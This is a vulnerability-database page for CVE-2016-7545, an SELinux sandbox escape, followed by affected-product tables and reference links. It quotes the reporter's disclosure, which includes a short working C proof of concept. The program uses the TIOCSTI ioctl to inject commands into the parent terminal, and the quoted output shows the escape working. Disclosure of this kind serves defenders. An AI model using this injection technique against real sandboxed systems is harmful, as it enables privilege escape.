CVE-2016-7545
First published: Thu Sep 22 2016(Updated: )
Hi, When executing a program via the SELinux sandbox, the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing an attacker to escape the sandbox. $ cat test.c #include <unistd.h> #include <sys/ioctl.h> int main() { char *cmd = "id\n"; while(*cmd) ioctl(0, TIOCSTI, cmd++); execlp("/bin/id", "id", NULL); } $ gcc test.c -o test $ /bin/sandbox ./test id uid=1000 gid=1000 groups=1000 context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176 [saken@ghetto ~]$ id <------ did not type this uid=1000(saken) gid=1000(saken) groups=1000(saken) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 This is similar to <a href="https://access.redhat.com/security/cve/CVE-2016-2568">CVE-2016-2568</a>, <a href="https://access.redhat.com/security/cve/CVE-2016-2779">CVE-2016-2779</a>, etc. Thanks, Federico Bento.
Credit: cve@mitre.org
| Affected Software | Affected Version | How to fix |
|---|---|---|
| SELinux Project SELinux | ||
| Fedoraproject Fedora | =25 | |
| Redhat Enterprise Linux Desktop | =6.0 | |
| Redhat Enterprise Linux Desktop | =7.0 | |
| Redhat Enterprise Linux Hpc Node | =6.0 | |
| Redhat Enterprise Linux Hpc Node | =7.0 | |
| Redhat Enterprise Linux Server | =6.0 | |
| Redhat Enterprise Linux Server | =7.0 | |
| Redhat Enterprise Linux Server Tus | =7.3 | |
| Redhat Enterprise Linux Workstation | =6.0 | |
| Redhat Enterprise Linux Workstation | =7.0 | |
| debian/policycoreutils | 3.1-3 3.4-1 3.5-2 |
Never miss a vulnerability like this again
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
Reference Links
- http://rhn.redhat.com/errata/RHSA-2016-2702.html
- http://rhn.redhat.com/errata/RHSA-2017-0535.html
- http://rhn.redhat.com/errata/RHSA-2017-0536.html
- http://www.openwall.com/lists/oss-security/2016/09/25/1
- http://www.securityfocus.com/bid/93156
- http://www.securitytracker.com/id/1037283
- https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UPRNK3PWMAVNJZ53YW5GOEOGJSFNAQIF/
- https://marc.info/?l=selinux&m=147465160112766&w=2
- https://bugzilla.redhat.com/show_bug.cgi?id=1378577
- https://marc.info/?t=147463464400001&r=1&w=2
- https://security-tracker.debian.org/tracker/CVE-2016-7545
- https://access.redhat.com/security/cve/CVE-2016-2568
- https://access.redhat.com/security/cve/CVE-2016-2779
- https://bugzilla.redhat.com/show_bug.cgi/show_bug.cgi?id=1378932
- https://marc.info/?l=selinux&m=147465156612756&w=2
- https://marc.info/?l=selinux&m=147466045909969&w=2
- https://access.redhat.com/security/cve/CVE-2016-7545
- http://seclists.org/oss-sec/2016/q3/606
- https://bugzilla.redhat.com/show_bug.cgi/show_bug.cgi?id=1378577#c4
- https://bugzilla.redhat.com/show_bug.cgi/attachment.cgi?id=1205640&action=diff
- https://bugzilla.redhat.com/show_bug.cgi/attachment.cgi?id=1205640&action=edit
- https://bugzilla.redhat.com/show_bug.cgi/attachment.cgi?id=1205641&action=diff
- https://bugzilla.redhat.com/show_bug.cgi/attachment.cgi?id=1205641&action=edit
- http://koji.fedoraproject.org/koji/taskinfo?taskID=15848819
- https://bugzilla.redhat.com/show_bug.cgi/attachment.cgi?id=1205642&action=diff
- https://bugzilla.redhat.com/show_bug.cgi/attachment.cgi?id=1205642&action=edit
- http://koji.fedoraproject.org/koji/taskinfo?taskID=15848928
- https://bugzilla.redhat.com/show_bug.cgi/attachment.cgi?id=1205646&action=diff
- https://bugzilla.redhat.com/show_bug.cgi/attachment.cgi?id=1205646&action=edit
- http://koji.fedoraproject.org/koji/taskinfo?taskID=15849131
- https://bugzilla.redhat.com/show_bug.cgi/attachment.cgi?id=1205663&action=diff
- https://bugzilla.redhat.com/show_bug.cgi/attachment.cgi?id=1205663&action=edit
- http://koji.fedoraproject.org/koji/taskinfo?taskID=15849416
- https://bugzilla.redhat.com/show_bug.cgi/attachment.cgi?id=1205679&action=diff
- https://bugzilla.redhat.com/show_bug.cgi/attachment.cgi?id=1205679&action=edit
- https://bugzilla.redhat.com/show_bug.cgi/attachment.cgi?id=1205701&action=diff
- https://bugzilla.redhat.com/show_bug.cgi/attachment.cgi?id=1205701&action=edit
- https://rhn.redhat.com/errata/RHSA-2016-2702.html
- https://rhn.redhat.com/errata/RHSA-2017-0536.html
- https://rhn.redhat.com/errata/RHSA-2017-0535.html
- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UPRNK3PWMAVNJZ53YW5GOEOGJSFNAQIF/
- collector/nvd-index
- agent/type
- agent/first-publish-date
- agent/last-modified-date
- collector/security-tracker-debian
- source/Debian
- agent/software-canonical-lookup
- collector/redhat-bugzilla
- source/Red Hat
- alias/CVE-2016-7545
- agent/references
- agent/weakness
- agent/severity
- agent/remedy
- agent/author
- agent/softwarecombine
- agent/tags
- agent/description
- agent/event
- collector/mitre-cve
- source/MITRE
- vendor/selinux project
- canonical/selinux project selinux
- vendor/fedoraproject
- canonical/fedoraproject fedora
- version/fedoraproject fedora/25
- vendor/redhat
- canonical/redhat enterprise linux desktop
- version/redhat enterprise linux desktop/6.0
- version/redhat enterprise linux desktop/7.0
- canonical/redhat enterprise linux hpc node
- version/redhat enterprise linux hpc node/6.0
- version/redhat enterprise linux hpc node/7.0
- canonical/redhat enterprise linux server
- version/redhat enterprise linux server/6.0
- version/redhat enterprise linux server/7.0
- canonical/redhat enterprise linux server tus
- version/redhat enterprise linux server tus/7.3
- canonical/redhat enterprise linux workstation
- version/redhat enterprise linux workstation/6.0
- version/redhat enterprise linux workstation/7.0
- package-manager/debian